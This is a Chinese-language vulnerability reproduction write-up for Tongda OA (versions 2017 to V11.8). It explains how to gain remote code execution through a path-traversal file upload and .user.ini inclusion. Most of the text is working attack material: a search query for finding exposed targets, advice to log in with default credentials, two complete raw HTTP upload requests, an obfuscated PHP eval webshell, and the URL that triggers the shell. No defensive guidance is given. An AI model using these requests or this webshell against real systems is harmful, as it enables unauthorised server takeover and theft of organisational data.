通达OA update存在后台文件包含漏洞
一、漏洞简介
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。通达OA v11.8及以下存在文件上传接口,可上传 .user.ini 文件包含有PHP语句的文件导致命令执行。
二、影响版本
- 通达2017-通达V11.8
三、资产测绘
- hunter
app.name="通达 OA"
- 登录页面
四、漏洞复现
- 使用默认密码admin,密码为空或采用通达OA任意用户登录登录后台;
- 通过上一步获取的cookie到日志文件
tongda.log
POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/tongda HTTP/1.1
Cookie: PHPSESSID=v5pjfe3ign7ge166a6383hnu01; path=/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17518323986548992951984057104
Host:
Content-Length: 471
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="ATTACHMENT"; filename="tongda.log"
Content-Type: text/plain
<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['x']);?>
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="submit"
保存
-----------------------------17518323986548992951984057104--
- 替换cookie,上传
.user.ini
文件包含tongda.log
文件
POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user HTTP/1.1
Cookie: PHPSESSID=v5pjfe3ign7ge166a6383hnu01; path=/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17518323986548992951984057104
Host:
Content-Length: 369
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="ATTACHMENT"; filename="config.ini"
Content-Type: text/plain
auto_prepend_file=tongda.log
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="submit"
保存
-----------------------------17518323986548992951984057104--
- 文件包含getshell
http://ip/general/reportshop/workshop/report/attachment-remark/form.inc.php